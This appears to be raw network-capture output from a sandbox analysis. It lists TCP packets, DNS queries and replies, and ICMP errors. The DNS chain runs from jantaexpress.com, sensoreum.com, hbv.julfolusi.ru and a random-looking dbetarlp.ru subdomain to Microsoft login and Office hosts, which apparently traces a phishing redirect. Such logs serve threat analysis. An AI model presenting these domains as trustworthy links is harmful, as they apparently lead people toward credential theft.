                                                                              Jan 20, 2025 14:18:30.628951073 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.629252911 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.629281044 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.630727053 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.630803108 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.631844044 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.631922960 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.632019997 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.632028103 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.675555944 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.862481117 CET49957443192.168.2.613.107.6.156
                                                                              Jan 20, 2025 14:18:30.862495899 CET4434995713.107.6.156192.168.2.6
                                                                              Jan 20, 2025 14:18:30.888142109 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.888273954 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.888391972 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.888402939 CET443548372.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.888422012 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.888454914 CET54837443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.889167070 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.889256954 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:30.889344931 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.889532089 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:30.889565945 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.535883904 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.536246061 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.536309958 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.536830902 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.537261963 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.537379980 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.537434101 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.537484884 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.537501097 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.911335945 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.911454916 CET443548382.19.126.146192.168.2.6
                                                                              Jan 20, 2025 14:18:31.911734104 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.911734104 CET54838443192.168.2.62.19.126.146
                                                                              Jan 20, 2025 14:18:31.911829948 CET54838443192.168.2.62.19.126.146
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 20, 2025 14:17:13.374444008 CET53514711.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:13.375394106 CET53540401.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:14.752912045 CET53650441.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:17.646512032 CET5954953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:17.646646976 CET4930853192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:17.653155088 CET53595491.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:17.653764963 CET53493081.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:19.271982908 CET4957953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:19.272959948 CET4945553192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:19.307173967 CET53494551.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:19.600929022 CET53495791.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:20.608639002 CET5995053192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:20.608835936 CET5435453192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:20.777910948 CET53599501.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:20.804223061 CET53543541.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:22.740396023 CET5371153192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:22.741746902 CET6337153192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:22.773638010 CET53633711.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:22.923329115 CET53537111.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:24.247860909 CET5099153192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:24.248723030 CET5159253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:24.262432098 CET53509911.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:24.262470007 CET53515921.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:26.389627934 CET6336953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.389857054 CET5191953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.390396118 CET5085253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.390538931 CET5172753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.390985966 CET5067253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.391164064 CET5110953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:26.398377895 CET53633691.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:26.398556948 CET53519191.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:26.399403095 CET53508521.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:26.399432898 CET53517271.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:26.400410891 CET53511091.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:27.173430920 CET5833253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:27.173430920 CET6367753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:27.180485964 CET53583321.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:27.180716038 CET53636771.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:27.415811062 CET5482853192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:27.423036098 CET53548281.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:27.701380968 CET5092853192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:27.701380968 CET5358953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:27.708211899 CET53535891.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:27.708511114 CET53509281.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:28.121371984 CET5683953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:28.121372938 CET6311753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:28.128108025 CET53568391.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:28.128299952 CET53631171.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:28.151284933 CET5998053192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:28.151451111 CET5400153192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:28.158592939 CET53540011.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:28.158808947 CET53599801.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:29.963509083 CET6167753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:29.963715076 CET6500053192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:29.970263004 CET53616771.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:29.970329046 CET53650001.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:31.731163979 CET53620611.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:40.283329964 CET5572953192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:40.283488989 CET5746253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:40.339921951 CET53574621.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:40.339963913 CET53557291.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:41.921459913 CET5332053192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:41.921660900 CET5848653192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:41.937096119 CET5884753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:41.937244892 CET6188653192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:41.949784994 CET53588471.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:42.032339096 CET53618861.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:42.997565031 CET5205653192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:42.998002052 CET6390753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:43.005325079 CET53639071.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:45.202908993 CET5268053192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:45.203191996 CET6510253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:45.245537996 CET53651021.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:46.346909046 CET5184253192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:46.347116947 CET5621753192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:17:50.825998068 CET53620661.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:51.376796007 CET53619941.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:17:55.198812008 CET53586851.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:18:01.525497913 CET6069653192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:18:01.525898933 CET5616353192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:18:13.185451031 CET53617561.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:18:23.229619026 CET53545691.1.1.1192.168.2.6
                                                                              Jan 20, 2025 14:18:29.973233938 CET5902853192.168.2.61.1.1.1
                                                                              Jan 20, 2025 14:18:29.973234892 CET5370653192.168.2.61.1.1.1
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              Jan 20, 2025 14:17:42.032461882 CET192.168.2.61.1.1.1c2b0(Port unreachable)Destination Unreachable
                                                                              Jan 20, 2025 14:17:45.245997906 CET192.168.2.61.1.1.1c26d(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 20, 2025 14:17:17.646512032 CET192.168.2.61.1.1.10xad08Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:17.646646976 CET192.168.2.61.1.1.10x4397Standard query (0)www.google.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:19.271982908 CET192.168.2.61.1.1.10x28acStandard query (0)jantaexpress.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:19.272959948 CET192.168.2.61.1.1.10x6d04Standard query (0)jantaexpress.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:20.608639002 CET192.168.2.61.1.1.10xd841Standard query (0)sensoreum.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:20.608835936 CET192.168.2.61.1.1.10xc405Standard query (0)sensoreum.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:22.740396023 CET192.168.2.61.1.1.10xb72bStandard query (0)sensoreum.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:22.741746902 CET192.168.2.61.1.1.10xae57Standard query (0)sensoreum.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:24.247860909 CET192.168.2.61.1.1.10x94bdStandard query (0)hbv.julfolusi.ruA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:24.248723030 CET192.168.2.61.1.1.10x56eeStandard query (0)hbv.julfolusi.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.389627934 CET192.168.2.61.1.1.10xedc6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.389857054 CET192.168.2.61.1.1.10xc2d2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.390396118 CET192.168.2.61.1.1.10xe55aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.390538931 CET192.168.2.61.1.1.10x535eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.390985966 CET192.168.2.61.1.1.10x89f3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.391164064 CET192.168.2.61.1.1.10x1a8Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.173430920 CET192.168.2.61.1.1.10xfe3dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.173430920 CET192.168.2.61.1.1.10x16ffStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.415811062 CET192.168.2.61.1.1.10x2373Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.701380968 CET192.168.2.61.1.1.10x7dd6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.701380968 CET192.168.2.61.1.1.10xb1a2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.121371984 CET192.168.2.61.1.1.10xe10dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.121372938 CET192.168.2.61.1.1.10x1715Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.151284933 CET192.168.2.61.1.1.10x3d16Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.151451111 CET192.168.2.61.1.1.10x3fb4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:29.963509083 CET192.168.2.61.1.1.10xd695Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:29.963715076 CET192.168.2.61.1.1.10xbfebStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:40.283329964 CET192.168.2.61.1.1.10xb21bStandard query (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ruA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:40.283488989 CET192.168.2.61.1.1.10xb146Standard query (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.921459913 CET192.168.2.61.1.1.10x18d9Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.921660900 CET192.168.2.61.1.1.10x3dcbStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.937096119 CET192.168.2.61.1.1.10x7c9bStandard query (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ruA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.937244892 CET192.168.2.61.1.1.10xc20dStandard query (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:42.997565031 CET192.168.2.61.1.1.10x2239Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:42.998002052 CET192.168.2.61.1.1.10x5adbStandard query (0)www.office.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.202908993 CET192.168.2.61.1.1.10x4646Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.203191996 CET192.168.2.61.1.1.10xd0ecStandard query (0)www.office.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.346909046 CET192.168.2.61.1.1.10x41f6Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.347116947 CET192.168.2.61.1.1.10x2dfaStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.525497913 CET192.168.2.61.1.1.10xbfdeStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.525898933 CET192.168.2.61.1.1.10x31bcStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.973233938 CET192.168.2.61.1.1.10x9cacStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.973234892 CET192.168.2.61.1.1.10xa767Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 20, 2025 14:17:17.653155088 CET1.1.1.1192.168.2.60xad08No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:17.653764963 CET1.1.1.1192.168.2.60x4397No error (0)www.google.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:19.600929022 CET1.1.1.1192.168.2.60x28acNo error (0)jantaexpress.com83.217.208.10A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:20.777910948 CET1.1.1.1192.168.2.60xd841No error (0)sensoreum.com66.63.187.232A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:22.923329115 CET1.1.1.1192.168.2.60xb72bNo error (0)sensoreum.com66.63.187.232A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:24.262432098 CET1.1.1.1192.168.2.60x94bdNo error (0)hbv.julfolusi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:24.262432098 CET1.1.1.1192.168.2.60x94bdNo error (0)hbv.julfolusi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:24.262470007 CET1.1.1.1192.168.2.60x56eeNo error (0)hbv.julfolusi.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.398377895 CET1.1.1.1192.168.2.60xedc6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.398377895 CET1.1.1.1192.168.2.60xedc6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.398377895 CET1.1.1.1192.168.2.60xedc6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.398377895 CET1.1.1.1192.168.2.60xedc6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.399403095 CET1.1.1.1192.168.2.60xe55aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.399403095 CET1.1.1.1192.168.2.60xe55aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.399432898 CET1.1.1.1192.168.2.60x535eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:26.400410891 CET1.1.1.1192.168.2.60x1a8No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.180716038 CET1.1.1.1192.168.2.60x16ffNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.180716038 CET1.1.1.1192.168.2.60x16ffNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.180716038 CET1.1.1.1192.168.2.60x16ffNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.180716038 CET1.1.1.1192.168.2.60x16ffNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.423036098 CET1.1.1.1192.168.2.60x2373No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.423036098 CET1.1.1.1192.168.2.60x2373No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.708211899 CET1.1.1.1192.168.2.60xb1a2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.708511114 CET1.1.1.1192.168.2.60x7dd6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:27.708511114 CET1.1.1.1192.168.2.60x7dd6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.128108025 CET1.1.1.1192.168.2.60xe10dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.128108025 CET1.1.1.1192.168.2.60xe10dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.128299952 CET1.1.1.1192.168.2.60x1715No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.158592939 CET1.1.1.1192.168.2.60x3fb4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.158808947 CET1.1.1.1192.168.2.60x3d16No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:28.158808947 CET1.1.1.1192.168.2.60x3d16No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:29.970263004 CET1.1.1.1192.168.2.60xd695No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:40.339921951 CET1.1.1.1192.168.2.60xb146No error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:40.339963913 CET1.1.1.1192.168.2.60xb21bNo error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru172.67.169.197A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:40.339963913 CET1.1.1.1192.168.2.60xb21bNo error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru104.21.27.217A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.68A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.136A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.22A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.14A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.74A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.17A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.138A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928425074 CET1.1.1.1192.168.2.60x18d9No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.20A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928505898 CET1.1.1.1192.168.2.60x3dcbNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928505898 CET1.1.1.1192.168.2.60x3dcbNo error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.928505898 CET1.1.1.1192.168.2.60x3dcbNo error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.949784994 CET1.1.1.1192.168.2.60x7c9bNo error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru172.67.169.197A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:41.949784994 CET1.1.1.1192.168.2.60x7c9bNo error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru104.21.27.217A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:42.032339096 CET1.1.1.1192.168.2.60xc20dNo error (0)pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru65IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.004218102 CET1.1.1.1192.168.2.60x2239No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.004218102 CET1.1.1.1192.168.2.60x2239No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.004218102 CET1.1.1.1192.168.2.60x2239No error (0)home-office365-com.b-0004.b-msedge.netb-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.004218102 CET1.1.1.1192.168.2.60x2239No error (0)b-0004.b-msedge.net13.107.6.156A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.005325079 CET1.1.1.1192.168.2.60x5adbNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:43.005325079 CET1.1.1.1192.168.2.60x5adbNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:44.281457901 CET1.1.1.1192.168.2.60xc72eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:44.281457901 CET1.1.1.1192.168.2.60xc72eNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:44.281457901 CET1.1.1.1192.168.2.60xc72eNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:44.281457901 CET1.1.1.1192.168.2.60xc72eNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.189027071 CET1.1.1.1192.168.2.60x1577No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.189027071 CET1.1.1.1192.168.2.60x1577No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.209528923 CET1.1.1.1192.168.2.60x4646No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
